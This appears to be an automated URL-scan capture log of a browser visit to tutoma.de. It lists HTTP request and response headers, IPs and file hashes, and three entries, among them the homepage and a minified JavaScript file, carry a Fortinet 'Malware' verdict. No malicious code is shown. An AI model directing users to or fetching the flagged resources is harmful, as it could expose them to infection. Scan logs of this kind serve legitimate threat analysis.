r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 1456357aecbd23f21ad98da57e0127eb
7074815b39fa8da9013883971d665e4c1b0797ea
f3eba265ee64870b2f822f1511b36c747d763c382557789cdad8be1d3b52d1f5
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "F3EBA265EE64870B2F822F1511B36C747D763C382557789CDAD8BE1D3B52D1F5"
Last-Modified: Mon, 21 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6637
Expires: Thu, 24 Nov 2022 00:12:51 GMT
Date: Wed, 23 Nov 2022 22:22:14 GMT
Connection: keep-alive
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash 770d09773b5f304acf141fd66a4862b4
5ddc46ab75de26c858a9a6f6d1beaaec9bb181f5
c7bcc6928fa1c0bb225ce8a2f6badd6cb1bd6ea002fb808ed34e8dafbd7b3b26
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4878
Cache-Control: max-age=135020
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:14 GMT
Etag: "637df674-1d7"
Expires: Fri, 25 Nov 2022 11:52:34 GMT
Last-Modified: Wed, 23 Nov 2022 10:31:16 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
firefox.settings.services.mozilla.com/v1/
34.102.187.140 200 OK 939 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 567df7db606cf5d0871aa5bc9311b6da
4263faac7cbab2fcaf6661911dcad5091c06be17
e9650e1fdc46fc8678708ddcc37ab369c7a6d50489a004be896f20c7a3a644b0
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Content-Type, Retry-After, Content-Length, Alert, Backoff
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 939
via: 1.1 google
date: Wed, 23 Nov 2022 22:17:12 GMT
cache-control: public,max-age=3600
content-type: application/json
age: 302
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash 8a6c553d89cb6fd1de4787fee2a0e0dc
b974e022ea8675c0a09f58864cc99df05b5b1241
a62ecedcb0953814f982237818a3d902fdca501f82b675629d28b5d476e0fbfa
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "A62ECEDCB0953814F982237818A3D902FDCA501F82B675629D28B5D476E0FBFA"
Last-Modified: Mon, 21 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13706
Expires: Thu, 24 Nov 2022 02:10:40 GMT
Date: Wed, 23 Nov 2022 22:22:14 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
34.160.144.191 200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain
IP 34.160.144.191:0
File type PEM certificate\012- , ASCII text
Hash 9ebddc2b260d081ebbefee47c037cb28
492bad62a7ca6a74738921ef5ae6f0be5edebf39
74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
GET /chains/remote-settings.content-signature.mozilla.org-2022-12-30-09-21-26.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
x-amz-id-2: nkvTzxD2dfDQjb7J20xJGRE03urvgII2dTUFBPuAuYLoC7LNCL5Wy+9j00+XSSLgaKaFjv/2uyo=
x-amz-request-id: 5TYBF3MY6EJAWG4H
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Wed, 23 Nov 2022 21:43:08 GMT
age: 2346
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
content-type: binary/octet-stream
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239 200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
www.tutoma.de/
87.98.235.184 301 Moved Permanently 0 B IP 87.98.235.184:0
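Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
(These are the MD5, SHA-1 and SHA-256 digests of empty input, consistent with the 0 B redirect body. They match any empty response and do not identify content from this host; the verdict below presumably rests on the URL or host rather than on the body.)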
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: www.tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
server: Apache
x-powered-by: PHP/7.0
x-redirect-by: WordPress
vary: Accept-Encoding
location: https://tutoma.de/
cache-control: max-age=0
expires: Wed, 23 Nov 2022 22:22:14 GMT
referrer-policy: no-referrer-when-downgrade
x-iplb-request-id: 5B5A2A9A:7C54_5762EBB8:0050_637E9D16_3532:1ABD1
x-iplb-instance: 18199
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
34.102.187.140 200 OK 329 B URL HTTP/2 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 34.102.187.140:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-expose-headers: Backoff, Pragma, Alert, Content-Type, ETag, Retry-After, Last-Modified, Content-Length, Cache-Control, Expires
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Wed, 23 Nov 2022 22:11:11 GMT
cache-control: public,max-age=3600
age: 664
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
content-type: application/json
alt-svc: clear
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.76.249 200 OK 503 B IP 23.36.76.249:0
ASN #20940 Akamai International B.V.
Hash b5fe536db29807b5c1a8a45342fc8985
0e53289c0b6584b23e407d6fd2507bb84180709f
936de84f89522de7579123a0f6b1963b1c007ceaf09b977e06f88988781f49e0
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "936DE84F89522DE7579123A0F6B1963B1C007CEAF09B977E06F88988781F49E0"
Last-Modified: Tue, 22 Nov 2022 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21494
Expires: Thu, 24 Nov 2022 04:20:29 GMT
Date: Wed, 23 Nov 2022 22:22:15 GMT
Connection: keep-alive
tutoma.de/
87.98.235.184 200 OK 53 kB IP 87.98.235.184:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (31046)
Hash 3384cd93863acdc81fa28e92072544c5
917cf5c426140970c8bed489b3de8b5449497a6b
b196bcf9d0d807c58e1fb0a0fa0e9a00c1a94f787af0e66a5f882ad54b3a7b88
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: text/html; charset=UTF-8
content-length: 52753
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Mon, 11 Nov 2019 17:12:35 GMT
accept-ranges: none
cache-control: max-age=0
expires: Wed, 23 Nov 2022 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
content-encoding: gzip
X-Firefox-Spdy: h2
tutoma.de/wp-content/cache/minify/c7035.js
87.98.235.184 200 OK 34 kB URL HTTP/2 tutoma.de/wp-content/cache/minify/c7035.js
IP 87.98.235.184:0
File type ASCII text, with very long lines (65446)
Hash def93ec455a8b3e08466dadc49e136ba
819e4c64013af82911c460cf01716fa0caf145bd
8addbc96d1ad10759cc9d0349896d631b984f94e09c138256fe24392dbb682dd
Analyzer Verdict Alert fortinet Malware
GET /wp-content/cache/minify/c7035.js HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: application/x-javascript
content-length: 33707
server: Apache
vary: Accept-Encoding
last-modified: Sun, 26 Jun 2022 14:03:46 GMT
accept-ranges: none
cache-control: max-age=18546090
expires: Mon, 26 Jun 2023 14:03:46 GMT
referrer-policy: no-referrer-when-downgrade
content-encoding: gzip
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo.png
87.98.235.184 200 OK 4.0 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo.png
IP 87.98.235.184:0
File type PNG image data, 260 x 53, 8-bit/color RGBA, non-interlaced\012- data
Hash 08ab7c9acb4dce28eeb913e426abf106
bb1ea2d24b527d3ae1926f46d0c21934816c9e50
54899ef3db8d756d1a1e6a64b242100a4f1fd904c0d60ed8ee6586e9bacc6b42
GET /wp-content/themes/tutoma/dist/images/tutoma-logo.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 3953
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29 200 OK 280 B IP 93.184.220.29:0
Hash fbd9db927efbfc1c3c3d97aa4a3cad25
4a43fa8251cc668940be76f56c5f151d44265c62
a0b3812fa80b40ccb80deed0bf3b41d60069fa317213d3aba8e7b0f27758bfde
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 3255
Cache-Control: max-age=152843
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Etag: "637e426b-118"
Expires: Fri, 25 Nov 2022 16:49:38 GMT
Last-Modified: Wed, 23 Nov 2022 15:55:23 GMT
Server: ECS (amb/6BBC)
X-Cache: HIT
Content-Length: 280
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash eb52164d651f5f45416e873aec29eb04
405b29bb7e7cd4367cf82988f8603e53db65f139
ed885e05db822ff30fe951e10b6d4f21e574d053939afca792992a1549a15301
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4064
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Last-Modified: Wed, 23 Nov 2022 21:14:31 GMT
Server: ECS (ska/F718)
X-Cache: HIT
Content-Length: 471
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash fb4ee3082622f9f3340432290d63437e
852ca64934462e133e34043fca561aca215e6255
d4c2f665873baede94309128e276df6fdf7f0e1ec15699e75cd6bae2c24d556a
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 065495ec7a963a205abd9c8dbc75cb5d
ea416d0df4f6706150bda5da2077174f5cdd986b
1b2a2afee887651b23a849f14ace89b330329f6bf61c331545a3f6d12037aee5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 23 Nov 2022 22:22:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
tutoma.de/wp-content/themes/tutoma/dist/images/home-image1.png
87.98.235.184 200 OK 154 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/home-image1.png
IP 87.98.235.184:0
File type PNG image data, 689 x 630, 8-bit colormap, non-interlaced\012- data
Size 154 kB (154253 bytes)
Hash 819c79c11e82a3deff6c0c4007dac260
97a793eb2be7bfdbb7645ae9f5966a653e04d434
aa9da9a4e4f8501db1849c51a61f3247e79ad1f32c75c42e8dfcf52fb8b0ea80
GET /wp-content/themes/tutoma/dist/images/home-image1.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 154253
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:10 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/home-image3.png
87.98.235.184 200 OK 175 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/home-image3.png
IP 87.98.235.184:0
File type PNG image data, 689 x 630, 8-bit colormap, non-interlaced\012- data
Size 175 kB (175335 bytes)
Hash 94de6f7a7ed55a2e32b8d46c0c039351
9c2539787198455bc52b53b0593247ccd5eafb5f
7250b0223f1321406dc6d9dd688b7ca8c9944b9144016fe570814a34b438d10e
GET /wp-content/themes/tutoma/dist/images/home-image3.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 175335
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:12 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/home-image2.png
87.98.235.184 200 OK 147 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/home-image2.png
IP 87.98.235.184:0
File type PNG image data, 689 x 630, 8-bit colormap, non-interlaced\012- data
Size 147 kB (146963 bytes)
Hash 8a51a5ae5d41f72ad5fadbebcc88b633
ae8704aa2a66970dfffb3e9a620f8ec8ce559688
009c3106aa4801e987be7eefe947f4479d0c2a2dfbdecf8825b3e57391d611c4
GET /wp-content/themes/tutoma/dist/images/home-image2.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 146963
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:14 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo2.png
87.98.235.184 200 OK 2.4 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-logo2.png
IP 87.98.235.184:0
File type PNG image data, 183 x 37, 8-bit/color RGBA, non-interlaced\012- data
Hash 264939e62bab6230273037bfdcc8c46e
be28c409cb598e64ab0315b9cfc6b53655225520
736e4932883554a6fbaa2d190400604532c9b191850476aea941a583324161ea
GET /wp-content/themes/tutoma/dist/images/tutoma-logo2.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2444
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-call.png
87.98.235.184 200 OK 45 kB URL HTTP/2 tutoma.de/wp-content/themes/tutoma/dist/images/tutoma-call.png
IP 87.98.235.184:0
File type PNG image data, 453 x 594, 8-bit colormap, non-interlaced\012- data
Hash 8a5a053bacb61360abce4b03b21c5915
31bfc01bbc348a8acb3e3407391152c60473959c
d9e81d6a174a8e9ebcf902ab8445fd2f417a2830f08fa35bb18736f079cc25c1
GET /wp-content/themes/tutoma/dist/images/tutoma-call.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 45447
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sat, 13 Apr 2019 10:21:28 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/help.png
87.98.235.184 200 OK 2.9 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/help.png
IP 87.98.235.184:0
File type PNG image data, 91 x 78, 8-bit/color RGBA, non-interlaced\012- data
Hash bf7e54ed151e2a70e7118fff3d4c301c
d338ba2ccb5119de9ec68c21c8dabc6afe51625e
edb14fe13d44e9b2a7083e2b820e954a766bb2b8c32cc809e197ea83444cfdcf
GET /wp-content/uploads/2018/09/help.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2923
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:58 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/off.png
87.98.235.184 200 OK 3.2 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/off.png
IP 87.98.235.184:0
File type PNG image data, 69 x 88, 8-bit/color RGBA, non-interlaced\012- data
Hash 415bfc94c936ffd1cb7c3e342e0b5006
abeb2eac35ebca9f133780214919c20682cdeabe
a254ec0ecd7eebdede1a255a16cdf2e5d132ffbd0790716f948cfa0db331c9f1
GET /wp-content/uploads/2018/09/off.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 3187
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:40:59 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
tutoma.de/wp-content/uploads/2018/09/icon2.png
87.98.235.184 200 OK 2.7 kB URL HTTP/2 tutoma.de/wp-content/uploads/2018/09/icon2.png
IP 87.98.235.184:0
File type PNG image data, 87 x 87, 8-bit/color RGBA, non-interlaced\012- data
Hash 763bf9c161ccd38766ce3d4a87c8ff44
9983baddc39fb43ffc1b750ac2cc68b6c59d231b
7be06021ea5d8e9b0990a26d16140f0ba95ef2649091fdfe8d6aad19c098b163
GET /wp-content/uploads/2018/09/icon2.png HTTP/1.1
Host: tutoma.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://tutoma.de/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
date: Wed, 23 Nov 2022 22:22:15 GMT
content-type: image/png
content-length: 2693
server: Apache
vary: X-Forwarded-Proto,Accept-Encoding
last-modified: Sun, 14 Oct 2018 17:41:00 GMT
accept-ranges: bytes
cache-control: max-age=31536000
expires: Thu, 23 Nov 2023 22:22:15 GMT
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2
ajax.googleapis.com/ajax/libs/webfont/1.5.18/webfont.js
